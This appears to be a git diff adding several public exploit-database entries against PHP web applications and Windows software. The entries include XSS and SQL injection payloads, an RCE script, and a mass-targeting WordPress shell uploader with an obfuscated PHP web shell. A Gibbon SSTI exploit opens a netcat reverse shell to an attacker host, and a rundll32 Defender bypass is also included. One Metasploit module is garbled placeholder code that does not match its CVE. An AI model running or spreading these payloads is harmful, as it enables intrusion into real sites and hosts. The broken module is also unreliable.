User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Referer: http://localhost/habit-tracker/home.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
```
## Recommendations
When using this tracking system, it is essential to update the application code to ensure that proper access controls are in place.

56
exploits/php/webapps/51955.txt Normal file
View file

@ -0,0 +1,56 @@
# Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS)
# Date: 2023-11-14
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code
# Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46020
-------------------------------------------------------------------------------
# Description:
The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile.
Vulnerable File: updateprofile.php
Parameters: rename, remail, rphone, rcity
# Proof of Concept:
----------------------
1. Intercept the POST request to updateprofile.php via Burp Suite
2. Inject the payload to the vulnerable parameters
3. Payload: "><svg/onload=alert(document.domain)>
4. Example request for rname parameter:
---
POST /bloodbank/file/updateprofile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
Origin: http://localhost
Connection: close
Referer: http://localhost/bloodbank/rprofile.php?id=1
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update
----
5. Go to the profile page and trigger the XSS
XSS Payload:
"><svg/onload=alert(document.domain)>

47
exploits/php/webapps/51956.py Executable file
View file

@ -0,0 +1,47 @@
#EXPLOIT Elementor Website Builder < 3.12.2 - Admin+ SQLi
#References
#CVE : CVE-2023-0329
#E1.Coders
 
#Open Burp Suite.
#In Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080.
#Open a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080.
#Visit the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page.
#On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL":
 
#code : http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2);#
#Press "Replace URL" on the Replace URL page. Burp Suite should intercept the request.
#Forward the intercepted request to the server by right-clicking the request in Burp Suite and selecting "Forward".
#The server will execute the SQL command, which will cause it to hang for 2 seconds before responding. This is a clear indication of successful SQL injection.
#Note: Make sure you have permission to perform these tests and have set up Burp Suite correctly. This command may vary depending on the specific setup of your server and the website builder plugin.</s
# 
#References : https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493/
 
 
 
 
#Exploit Python  :
#The provided SQLi attack vector can be achieved using the following Python code with the "requests" library:
 
#This script sends a POST request to the target URL with the SQLi payload as the "data" parameter. It then checks if the response contains the SQLi payload, indicating a successful SQL injection.
#Please make sure you have set up your Burp Suite environment correctly. Additionally, it is important to note that this script and attack have been TESTED and are correct
 
import requests
 
# Set the target URL and SQLi payload
url = "http://localhost:8080/wp-admin/admin-ajax.php"
data = {
    "action": "elementor_ajax_save_builder",
    "editor_post_id": "1",
    "post_id": "1",
    "data": "test'),meta_key='key4'where+meta_id=SLEEP(2);#"
}
 
# Send the request to the target URL
response = requests.post(url, data=data)
 
# Check if the response indicates a successful SQL injection
if "meta_key='key4'where+meta_id=SLEEP(2);#" in response.text:
    print("SQL Injection successful!")
else:
    print("SQL Injection failed.")

138
exploits/php/webapps/51957.py Executable file
View file

@ -0,0 +1,138 @@
## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)
#### Date: 2023-11-25
#### Exploit Author: tmrswrr
#### Category: Webapps
#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)
#### Version: v1.0.8.20
#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)
## EXPLOIT :
import requests
from bs4 import BeautifulSoup
import sys
import urllib.parse
import random
from time import sleep
class colors:
OKBLUE = '\033[94m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
CBLACK = '\33[30m'
CRED = '\33[31m'
CGREEN = '\33[32m'
CYELLOW = '\33[33m'
CBLUE = '\33[34m'
CVIOLET = '\33[35m'
CBEIGE = '\33[36m'
CWHITE = '\33[37m'
def entry_banner():
color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
colors.CRED, colors.CBEIGE]
random.shuffle(color_random)
banner = color_random[0] + """
CE Phoenix v1.0.8.20 - Remote Code Execution \n
Author: tmrswrr
"""
for char in banner:
print(char, end='')
sys.stdout.flush()
sleep(0.0045)
def get_formid_and_cookies(session, url):
response = session.get(url, allow_redirects=True)
if response.ok:
soup = BeautifulSoup(response.text, 'html.parser')
formid_input = soup.find('input', {'name': 'formid'})
if formid_input:
return formid_input['value'], session.cookies
return None, None
def perform_exploit(session, url, username, password, command):
print("\n[+] Attempting to exploit the target...")
initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"
formid, cookies = get_formid_and_cookies(session, initial_url)
if not formid:
print("[-] Failed to retrieve initial formid.")
return
# Login
print("[+] Performing login...")
login_payload = {
'formid': formid,
'username': username,
'password': password
}
login_headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
'Referer': initial_url
}
login_url = url + "/admin/login.php?action=process"
login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)
if not login_response.ok:
print("[-] Login failed.")
print(login_response.text)
return
print("[+] Login successful.")
new_formid, _ = get_formid_and_cookies(session, login_response.url)
if not new_formid:
print("[-] Failed to retrieve new formid after login.")
return
# Exploit
print("[+] Executing the exploit...")
encoded_command = urllib.parse.quote_plus(command)
exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"
exploit_headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
'Referer': login_response.url
}
exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"
exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)
if exploit_response.ok:
print("[+] Exploit executed successfully.")
else:
print("[-] Exploit failed.")
print(exploit_response.text)
final_response = session.get(url)
print("\n[+] Executed Command Output:\n")
print(final_response.text)
def main(base_url, username, password, command):
print("\n[+] Starting the exploitation process...")
session = requests.Session()
perform_exploit(session, base_url, username, password, command)
if __name__ == "__main__":
entry_banner()
if len(sys.argv) < 5:
print("Usage: python script.py [URL] [username] [password] [command]")
sys.exit(1)
base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
command = sys.argv[4]
main(base_url, username, password, command)

112
exploits/php/webapps/51958.txt Normal file
View file

@ -0,0 +1,112 @@
# Exploit Title: Smart School 6.4.1 - SQL Injection
# Exploit Author: CraCkEr
# Date: 28/09/2023
# Vendor: QDocs - qdocs.net
# Vendor Homepage: https://smart-school.in/
# Software Link: https://demo.smart-school.in/
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-5495
# CWE: CWE-89 - CWE-74 - CWE-707
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /course/filterRecords/
POST Parameter 'searchdata[0][title]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi
searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]
-------------------------------------------
POST /course/filterRecords/ HTTP/1.1
searchdata%5B0%5D%5Btitle%5D=rating&searchdata%5B0%5D%5Bsearchfield%5D=sleep(5)%23&searchdata%5B0%5D%5Bsearchvalue%5D=3
-------------------------------------------
searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]
Path: /course/filterRecords/
POST Parameter 'searchdata[0][title]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi
POST Parameter 'searchdata[1][title]' is vulnerable to SQLi
POST Parameter 'searchdata[1][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[1][searchvalue]' is vulnerable to SQLi
---
Parameter: searchdata[0][title] (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low
Parameter: searchdata[0][searchfield] (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low
Parameter: searchdata[0][searchvalue] (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low
Parameter: searchdata[1][title] (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low
Parameter: searchdata[1][searchvalue] (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z
---
-------------------------------------------
POST /course/filterRecords/ HTTP/1.1
searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]
-------------------------------------------
Path: /online_admission
---
Parameter: MULTIPART email ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: -----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="class_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="section_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="firstname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="lastname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="gender"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="dob"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mobileno"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="email"\n\n'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="file"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="father_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mother_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_relation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_email"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_pic"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_phone"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_occupation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="current_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="permanent_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="adhar_no"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="samagra_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="previous_school"\n\n\n-----------------------------320375734131102816923531485385--
---
POST Parameter 'email' is vulnerable to SQLi
POST /online_admission HTTP/1.1
-----------------------------320375734131102816923531485385
Content-Disposition: form-data; name="email"
*[SQLi]
-----------------------------320375734131102816923531485385
[-] Done

69
exploits/php/webapps/51959.txt Normal file
View file

@ -0,0 +1,69 @@
# Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)
# Date: 2024-02-25
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox
import sys , requests, re , json
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)
headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux;
Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like
Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate', 'Accept-Language':
'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'}
uploader = """
GIF89a
<?php ?>
<!DOCTYPE html>
<html>
<head>
<title>Resultz</title>
</head>
<body><h1>Uploader</h1>
<form enctype='multipart/form-data' action='' method='POST'>
<p>Uploaded</p>
<input type='file' name='uploaded_file'></input><br />
<input type='submit' value='Upload'></input>
</form>
</body>
</html>
<?PHP
if(!empty($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')])){$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=base64_decode('Li8=');$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485.basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]);if(move_uploaded_file($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('dG1wX25hbWU=')],$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485)){echo
base64_decode('VGhlIGZpbGUg').basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]).base64_decode('IGhhcyBiZWVuIHVwbG9hZGVk');}else{echo
base64_decode('VGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB0aGUgZmlsZSwgcGxlYXNlIHRyeSBhZ2FpbiE=');}}?>
"""
requests.urllib3.disable_warnings()
def Exploit(Domain):
try:
if 'http' in Domain:
Domain = Domain
else:
Domain = 'http://'+Domain
myup = {'': ('db.php', uploader)}
req = requests.post(Domain +
'/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload',
files=myup, headers=headers,verify=False, timeout=10).text
req1 = requests.get(Domain +
'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php')
if 'Ex3ptionaL' in req1:
print (fg+'[+] '+ Domain + ' --> Shell Uploaded')
open('Shellz.txt', 'a').write(Domain +
'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' + '\n')
else:
print (fr+'[+] '+ Domain + '{}{} --> Not Vulnerability')
except:
print(fr+' -| ' + Domain + ' --> {} [Failed]')
target = open(input(fm+"Site List: "), "r").read().splitlines()
mp = Pool(int(input(fm+"Threads: ")))
mp.map(Exploit, target)
mp.close()
mp.join()

81
exploits/php/webapps/51962.txt Normal file
View file

@ -0,0 +1,81 @@
# Exploit Title: Gibbon LMS v26.0.00 - SSTI vulnerability
# Date: 21.01.2024
# Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli)
# Vendor Homepage: https://gibbonedu.org/
# Software Link: https://github.com/GibbonEdu/core
# Version: v26.0.00
# Tested on: Ubuntu 22.0
# CVE : CVE-2024-24724
import requests
import re
import sys
def login(target_host, target_port,email,password):
url = f'http://{target_host}:{target_port}/login.php?timeout=true'
headers = {"Content-Type": "multipart/form-data;
boundary=---------------------------174475955731268836341556039466"}
data =
f"-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition:
form-data;
name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n"
r = requests.post(url, headers=headers, data=data,
allow_redirects=False)
Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie'])
if Session_Cookie[4] is not None and '/index.php' in
str(r.headers['Location']):
print("login successful!")
return Session_Cookie[4]
def rce(cookie, target_host, target_port, attacker_ip, attacker_port):
url =
f'http://{target_host}:{target_port}/modules/School%20Admin/messengerSettingsProcess.php'
headers = {"Content-Type": "multipart/form-data;
boundary=---------------------------67142646631840027692410521651",
"Cookie": cookie}
data =
f"-----------------------------67142646631840027692410521651\r\nContent-Disposition:
form-data; name=\"address\"\r\n\r\n/modules/School
Admin/messengerSettings.php\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition:
form-data;
name=\"enableHomeScreenWidget\"\r\n\r\nY\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition:
form-data; name=\"signatureTemplate\"\r\n\r\n{{{{[\'rm /tmp/f;mkfifo
/tmp/f;cat /tmp/f|sh -i 2>&1|nc {attacker_ip} {attacker_port}
>/tmp/f']|filter('system')}}}}\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"messageBcc\"\r\n\r\n\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"pinnedMessagesOnHome\"\r\n\r\nN\r\n-----------------------------67142646631840027692410521651--\r\n"
r = requests.post(url, headers=headers, data=data,
allow_redirects=False)
if 'success0' in str(r.headers['Location']):
print("Payload uploaded successfully!")
def trigger(cookie, target_host, target_port):
url =
f'http://{target_host}:{target_port}/index.php?q=/modules/School%20Admin/messengerSettings.php&return=success0'
headers = {"Cookie": cookie}
print("RCE successful!")
r = requests.get(url, headers=headers, allow_redirects=False)
if __name__ == '__main__':
if len(sys.argv) != 7:
print("Usage: script.py <target_host> <target_port>
<attacker_ip> <attacker_port> <email> <password>")
sys.exit(1)
cookie = login(sys.argv[1], sys.argv[2],sys.argv[5],sys.argv[6])
rce(cookie, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])
trigger(cookie, sys.argv[1], sys.argv[2])

65
exploits/php/webapps/51963.txt Normal file
View file

@ -0,0 +1,65 @@
# Exploit Title: Axigen < 10.5.7 - Persistent Cross-Site Scripting
# Date: 2023-09-25
# Exploit Author: Vinnie McRae - RedTeamer IT Security
# Vendor Homepage: https://www.axigen.com/
# Software Link: https://www.axigen.com/mail-server/download/
# Version: (10.5.7) and older version of Axigen WebMail
# Tested on: firefox, chrome
# CVE: CVE-2023-48974
Description
The `serverName_input` parameter is vulnerable to stored cross-site
scripting (XSS) due to unsanitized or unfiltered processing. This means
that an attacker can inject malicious code into this parameter, which will
then be executed by other users when they view the page where the parameter
is used. This is affecting authenticated administrators, and the attack can
be used to attack other administrators with more permissions.
Exploitation
1. Login as administrator
2. Navigate to "global settings"
3. Change server name to <script>alert(1)</script>
PoC of the POST request:
```
POST /?_h=1bb40e85937506a7186a125bd8c5d7ef&page=gl_set HTTP/1.1
Host: localhost:9443
Cookie: eula=true;
WMSessionObject=%7B%22accountFilter%22%3A%22%22%2C%22currentDomainName%22%3A%22axigen%22%2C%22currentPrincipal%22%3A%22nada%22%2C%22domainFilter%22%3A%22%22%2C%22folderRecipientFilter%22%3A%22%22%2C%22groupFilter%22%3A%22%22%2C%22helpContainer%22%3A%22opened%22%2C%22leftMenu%22%3A%5B%22rights%22%2C%22services%22%2C%22clustering%22%2C%22domains%22%2C%22logging%22%2C%22backup%22%2C%22security%22%5D%2C%22mlistFilter%22%3A%22%22%2C%22premiumFilter%22%3A%22%22%2C%22sslCertificateFilter%22%3A%22%22%7D;
webadminIsModified=false; webadminIsUpdated=true; webadminIsSaved=true;
public_language=en; _hadmin=6a8ed241fe53d1b28f090146e4c65f52;
menuLeftTopPosition=-754
Content-Type: multipart/form-data;
boundary=---------------------------41639384187581032291088896642
Content-Length: 12401
Connection: close
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="serverName_input"
<script>alert(1)</script>
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="primary_domain_input"
axigen
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="ssl_random_file_input"
--SNIP--
-----------------------------41639384187581032291088896642
Content-Disposition: form-data; name="update"
Save Configuration
-----------------------------41639384187581032291088896642--
```
#______________________________
#Vinnie McRae
#RedTeamer IT Security
#Blog: redteamer.de/blog-beitrag/

27
exploits/windows/local/51939.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: ASUS Control Center Express 01.06.15 - Unquoted Service Path
Privilege Escalation
# Date: 2024-04-02
# Exploit Author: Alaa Kachouh
# Vendor Homepage:
https://www.asus.com/campaign/ASUS-Control-Center-Express/global/
# Version: Up to 01.06.15
# Tested on: Windows
# CVE: CVE-2024-27673
===================================================================
ASUS Control Center Express Version =< 01.06.15 contains an unquoted
service path which allows attackers to escalate privileges to the system
level.
Assuming attackers have write access to C:\, the attackers can abuse the
Asus service "Apro console service"/apro_console.exe which upon restarting
will invoke C:\Program.exe with SYSTEM privileges.
The binary path of the service alone isn't susceptible, but upon its
initiation, it will execute C:\program.exe as SYSTEM.
Service Name: AProConsoleService
binary impacted: apro_console.exe
# If a malicious payload is inserted into C:\ and service is executed in
any way, this can grant privileged access to the system and perform
malicious activities.

35
exploits/windows/local/51941.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path
# Date: 2024-04-2
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.rapid7.com/
# Software Link: https://www.rapid7.com/products/nexpose/
# Version: 6.6.240
# Tested: Windows 10 x64
# Step to discover Unquoted Service Path:
C:\Users\saudh>wmic service where 'name like "%nexposeconsole%"' get name, displayname, pathname, startmode, startname
DisplayName Name PathName StartMode StartName
Nexpose Security Console nexposeconsole "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe" Auto LocalSystem
# Service info:
C:\Users\saudh>sc qc nexposeconsole
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: nexposeconsole
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : "C:\Program Files\rapid7\nexpose\nsc\bin\nexlaunch.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Nexpose Security Console
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

70
exploits/windows/local/51946.rb Executable file
View file

@ -0,0 +1,70 @@
#############################################
# Exploit Title :  Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation
# Exploit Author: E1 Coders
# CVE: CVE-2024-21338
#############################################
 
require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact
 
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CVE-2024-21338 Exploit',
        'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',
        'Author' => 'You',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-21338']
        ]
      )
    )
 
    register_options(
      [
        OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),
        OptPort.new('RPORT', [true, 'The target port', 1234])
      ]
    )
  end
 
  def check
    connect
 
    begin
      impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')
    rescue Rex::Post::Meterpreter::RequestError
      return Exploit::CheckCode::Safe
    end
 
    Exploit::CheckCode::Appears
  end
 
  def exploit
    connect
 
    begin
      impacket_artifact(
        dcerpc_binding('ncacn_ip_tcp'),
        'FooBar',
        datastore['FooBarPayload']
      )
    rescue Rex::Post::Meterpreter::RequestError
      fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'
    end
 
    handler
    disconnect
  end
end
 
 
#refrence :  https://nvd.nist.gov/vuln/detail/CVE-2024-21338
 

75
exploits/windows/local/51960.txt Normal file
View file

@ -0,0 +1,75 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Windows Defender
[Vulnerability Type]
Windows Defender Detection Mitigation Bypass
TrojanWin32Powessere.G
[CVE Reference]
N/A
[Security Issue]
Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail
and attackers will typically get an "Access is denied" error message.
Back in 2022, I first disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml but since has been mitigated.
Recently Feb 7, 2024, I disclosed using multi-commas "," will bypass that mitigation but has since been fixed again.
The fix was short lived as I find yet another third trivial bypass soon after.
[Exploit/POC]
Open command prompt as Administrator.
C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(13)
Access is denied.
C:\sec>rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert('HYP3RLINX')
[Video PoC URL]
https://www.youtube.com/watch?v=yn9gdJ7c7Kg
[Network Access]
Local
[Severity]
High
[References]
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
https://twitter.com/hyp3rlinx/status/1755417914599956833
https://twitter.com/hyp3rlinx/status/1758624140213264601
[Disclosure Timeline]
Vendor Notification:
February 16, 2024 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
